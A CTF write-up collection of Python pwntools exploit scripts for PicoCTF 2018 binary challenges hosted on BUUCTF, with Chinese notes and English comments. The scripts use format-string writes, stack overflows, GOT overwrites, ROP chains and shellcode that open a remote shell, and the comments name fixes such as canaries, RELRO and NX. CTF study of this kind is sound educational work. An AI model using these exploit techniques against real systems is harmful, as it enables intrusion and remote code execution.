are_you_root

  • 验证码未初始化,第一次覆盖下一次的验证码后,下一次验证码为上一次覆盖
from pwn import *
context.log_level = "debug"  # log every byte exchanged with the remote tube
elf = ELF("./PicoCTF_2018_are_you_root")  # loaded but never referenced later in this script
sh = remote("node3.buuoj.cn","27788")  # BUUCTF-hosted instance of the PicoCTF 2018 challenge

def login(name):
    """Send `login <name>` at the next `> ` prompt; `name` is forwarded as given."""
    command = "login " + name
    sh.sendlineafter("> ", command)

def reset():
    """Send the `reset` command at the next `> ` prompt."""
    prompt = "> "
    sh.sendlineafter(prompt, "reset")

def get_flag():
    """Send the `get-flag` command at the next `> ` prompt."""
    prompt = "> "
    sh.sendlineafter(prompt, "get-flag")

if __name__ == '__main__':
    # Python 2 script: `print` statement and str + p64() bytes concatenation
    # would both fail under Python 3.
    # Step 1: a 16-byte "name" whose second qword is 0x5, the auth level the
    # script wants. Per the note above the level is never initialised, so
    # this value is presumably left in memory the program reuses for the
    # next user record - confirm against the binary.
    login('a'*0x8+p64(0x5))
    # Step 2: drop the current user; the stale 0x5 is expected to stay behind.
    reset()
    # Step 3: the next login picks up the stale level, then the flag is requested.
    login("joe1sn")
    get_flag()
    print sh.recv(50)

authenticate

  • 字符串格式化漏洞修改 authenticated 的值
from pwn import *
context.log_level = "debug"
elf = ELF("./PicoCTF_2018_authenticate")
#sh = process("./PicoCTF_2018_authenticate")
sh = remote("node3.buuoj.cn","26278")

# Global `authenticated` flag; a fixed address, so the binary is not PIE.
authenticated_addr = 0x0804A04C
# The yes/no answer is handed to printf() as its format string (note above).
# pwntools builds the %n-style write that stores 1 into the flag; 11 is the
# position of the input buffer among printf's stack arguments.
# Server-side fix: printf("%s", buf) (and build with -Wformat-security).
fmt_write = fmtstr_payload(11, {authenticated_addr: 1})
sh.sendlineafter("(yes/no)\n", fmt_write)
sh.recvuntil("Access Granted.\n")
print sh.recv(0x30)

buffer_overflow_0

  • strcpy溢出,接收参数溢出过后,自动打印出flag

buffer_overflow_1

  • gets溢出
from pwn import *
context.log_level = "debug"
elf = ELF("./PicoCTF_2018_buffer_overflow_1")
p = remote("node3.buuoj.cn","25355")

# gets() reads an unbounded line (note above): 0x28 bytes fill the stack
# buffer, 4 more presumably cover the saved ebp, and the next 4 replace the
# saved return address with win(). Server-side fix: fgets()/a bounded read;
# a stack canary would also catch the overwrite.
padding = "a" * (0x28 + 4)
payload = padding + p32(elf.sym["win"])

p.sendlineafter("Please enter your string: \n", payload)
p.interactive()

buffer_overflow_2

  • gets溢出+libc leak
from pwn import *
from LibcSearcher import *
context.log_level= "debug"
elf = ELF("./PicoCTF_2018_buffer_overflow_2")
#p =process("./PicoCTF_2018_buffer_overflow_2")
p = remote("node3.buuoj.cn","25896")

# puts GOT/PLT and the vuln() address are only used by the libc-leak variant
# kept in the string literal at the bottom; the active path never reads them.
puts_got = elf.got["puts"]
puts_plt = elf.plt["puts"]
vuln_addr = 0x08048646
win = elf.sym["win"]

# gets() overflow (note above): 0x6c bytes of buffer + 4 (presumably the
# saved ebp) reach the saved return address. What follows is a 32-bit cdecl
# call frame for win(): target, its return address (0 - the process just
# faults once win() has returned), then two arguments, presumably the
# values win() checks. Server-side fix: bounded read + stack canary.
payload = "a"*(0x6c+4)
payload += p32(win)+p32(0)+p32(0xDEADBEEF)+p32(0xDEADC0DE)
p.sendline(payload)
p.interactive()
#payload += p32(puts_plt)+p32(vuln_addr)+p32(puts_got)
# Inactive alternative below (a bare string literal, never executed): leak
# puts()'s libc address via the PLT, resolve system()/"/bin/sh" with the
# third-party LibcSearcher package, return into vuln() for a second overflow.
'''
p.sendline(payload)

puts_real = u32(p.recv(4))
libc = LibcSearcher("puts",puts_real)
base = puts_real - libc.dump("puts")

sys_addr = base + libc.dump("system")
binsh = base + libc.dump("str_bin_sh")

payload = 'a'*(0x6c+4)
payload += p32(sys_addr)+p32(0)+p32(binsh)
p.sendline(payload)
p.interactive()
'''

buffer_overflow_3

爆破canary文件,然后rop

虚拟机崩了,原来的exp.py找不回来了,这个网上随便找一个就行

can_you_gets_me

  • gets溢出+rop链自动生成
from pwn import *
from struct import pack
context.log_level = "debug"
elf = ELF("./PicoCTF_2018_can-you-gets-me")
sh = remote("node3.buuoj.cn","29149")

# Generated (ROPgadget-style) execve("/bin//sh", NULL, NULL) chain; the
# per-gadget comments are the generator's. Every address is a fixed
# 0x080xxxxx value, which only works because the binary is not position
# independent (presumably statically linked - all gadgets live in the
# binary). Root cause is the gets() call noted above; NX does not stop a
# return-oriented chain, a stack canary or PIE/ASLR would.
p = 'a'*(0x18+4)  # 0x18-byte buffer + 4 (presumably saved ebp) up to the return address
# Write "/bin" and "//sh" into .data through pop/mov gadgets ...
p += pack('<I', 0x0806f02a) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080b81c6) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x080549db) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806f02a) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080b81c6) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x080549db) # mov dword ptr [edx], eax ; ret
# ... followed by a zero dword (eax == 0 after the xor) as the terminator.
p += pack('<I', 0x0806f02a) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x08049303) # xor eax, eax ; ret
p += pack('<I', 0x080549db) # mov dword ptr [edx], eax ; ret
# ebx = path; ecx and edx = address of the zero dword (empty argv/envp).
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080de955) # pop ecx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x0806f02a) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
# eax = 0 + eleven increments = 11, the i386 execve syscall number, then int 0x80.
p += pack('<I', 0x08049303) # xor eax, eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0806cc25) # int 0x80

sh.sendlineafter("NAME!\n",p)
sh.interactive()

echo_back

  • 字符串格式化漏洞,覆盖puts为vuln,然后继续操作
from pwn import *
context.log_level = "debug"
elf = ELF("./PicoCTF_2018_echo_back")
#sh = process("./PicoCTF_2018_echo_back")
sh = remote("node3.buuoj.cn","27050")

# Format-string bug in the echo handler (note above), used in three steps.
# The binary is non-PIE (fixed vuln() address) with a writable GOT: Full
# RELRO would block both GOT writes, printf("%s", buf) removes the bug.
vuln = 0x080485AB
# 1. Point puts's GOT entry at vuln() so the service re-enters the echo
#    routine (note above: "覆盖puts为vuln,然后继续操作"). 7 is the position
#    of the input buffer among printf's stack arguments.
payload = fmtstr_payload(7,{elf.got["puts"]:vuln})
sh.sendlineafter("input your message:\n",payload)

# 2. Leak system()'s address: the GOT slot address is placed as argument 7
#    and "%7$s" prints the bytes it points to. Assumes that slot already
#    holds the resolved libc address and that libc sits at 0xf7xxxxxx
#    (the last 4 bytes up to and including 0xf7 are taken).
leak_payload = p32(elf.got["system"])+'%7$s'
sh.send(leak_payload)
sh.recvuntil('input your message:\n')
system_addr = u32(sh.recvuntil('\xf7')[-4:])
success("system addr -> "+hex(system_addr))

# 3. Redirect printf's GOT entry to system(), so the next echo of the
#    user's line runs it as a command.
payload = fmtstr_payload(7,{elf.got["printf"]:system_addr})
sh.send(payload)

sh.sendline("/bin/sh\x00")
sh.interactive()

echooo

  • 字符串格式化漏洞,导致已读入 stream 的 flag 文件内容被读取出来
from pwn import *
context.log_level = "debug"
elf = ELF("./PicoCTF_2018_echooo")
p = remote("node3.buuoj.cn","29044")
# The echo goes through printf() with user data as the format (note above),
# so "%8$s" prints whatever the 8th stack argument points to - per the note,
# the buffer the flag file was read into. Fix: printf("%s", buf).
fmt = "%8$s"
p.sendlineafter("> ", fmt)
p.interactive()

got_shell

  • 交换puts函数的got为后门函数
from pwn import *
context.log_level = "debug"
elf = ELF("./PicoCTF_2018_got-shell")
#p = process("./PicoCTF_2018_got-shell")
p = remote("node3.buuoj.cn","27340")

# The service takes an address and then a 4-byte value as hex text and
# writes the value there (prompt "4 byte value?"). Pointing puts's GOT slot
# at win() makes the next puts() call run the backdoor (note above).
# Full RELRO would make the GOT read-only and defeat this.
write_where = hex(elf.got["puts"])
write_what = hex(elf.sym["win"])

p.sendlineafter("4 byte value?\n", write_where)
p.sendlineafter("\n", write_what)

p.interactive()

gps

  • 程序会跳转到一个地址,然后执行
from pwn import *
context.log_level = "debug"
context.arch="amd64"  # so asm()/shellcraft emit x86-64 code
#p = process("./picoctf_2018_gps")
p = remote("node3.buuoj.cn","26522")

# The service prints an address it will later jump to (note above); rc is
# that value, parsed from 12 hex digits (a 48-bit user-space address).
p.recvuntil("Current position: 0x")
rc = int(p.recv(12),16)
# Stack guess derived from the leak; only logged here - the commented-out
# line at the bottom is the earlier attempt to use it as the target.
stack = rc + 0x29c +0x520
info("stack -> 0x%x",stack)
# shellcraft.sh() shellcode right-aligned in a (0x1000-20)-byte NOP (0x90)
# sled, so landing anywhere in the sled slides into it; the leaked address
# is then sent as the jump target. This needs the input buffer to be
# executable - NX would make the jump fault instead of running it.
p.sendlineafter("> ",asm(shellcraft.sh()).rjust(0x1000-20,"\x90"))
p.sendlineafter("> ",hex(rc))
p.interactive()
#p.sendlineafter("> ",p64(stack))

leak_me

  • 读取password.txt的栈刚好在fgets后面,通过填充leak password.txt的内容后,输入password得到flag
from pwn import *
context.log_level = "debug"
#p = process("./PicoCTF_2018_leak-me")
p = remote("node3.buuoj.cn","27898")
# Fill the name buffer to its last byte so the echoed name runs straight
# into the adjacent stack buffer holding password.txt (note above); the
# leaked password is then sent back. `password` keeps its trailing newline.
name_len = 0x100 - 1
p.sendafter("What is your name?", "a" * name_len)
p.recvuntil("a" * name_len + ",")
password = p.recvuntil("\n")
p.sendline(password)
p.interactive()

rop_chain

  • 溢出过后,64位使用寄存器传参,填入参数满足后门函数就好
from pwn import *
context.log_level = "debug"
p = remote("node3.buuoj.cn","27583")
#p = process("./PicoCTF_2018_rop_chain")
elf = ELF('./PicoCTF_2018_rop_chain')

# Fixed (non-PIE) addresses of the three backdoor functions and a
# `pop ; ret` gadget. NOTE(review): p32() and stack-passed arguments mean a
# 32-bit cdecl target, which does not match the "64-bit register arguments"
# wording of the note above.
func1 = 0x080485CB
func2 = 0x080485d8
flag = 0x0804862B
pop_ret = 0x080485d6
buf = 'a'*0x18  # buffer size; the 4 bytes appended below presumably cover saved ebp

payload = buf + 'aaaa'
# Each link: target function, the pop;ret gadget as its return address
# (pops the one argument slot that follows and continues the chain), then
# that argument. Whether func1 reads the 0 cannot be told from here.
# Root cause is the overflow into the return address - bounded read plus a
# stack canary on the server side; PIE would also randomise these addresses.
payload += p32(func1)+p32(pop_ret) + p32(0)
payload += p32(func2)+p32(pop_ret) + p32(0xBAAAAAAD)
payload += p32(flag)+p32(pop_ret) + p32(0xDEADBAAD)

p.recvuntil('>')
p.sendline(payload)

p.interactive()

shellcode

  • 程序可以执行刚才输入的代码,直接填入shellcode
from pwn import *
context.log_level = "debug"
p = remote("node3.buuoj.cn","25260")

# The service executes the bytes it just read (note above), so the input is
# a pwntools shell shellcode. Only possible because the buffer is executable;
# NX would turn the jump into a fault.
sh_payload = asm(shellcraft.sh())
p.sendlineafter("Enter a string!\n", sh_payload)
p.interactive()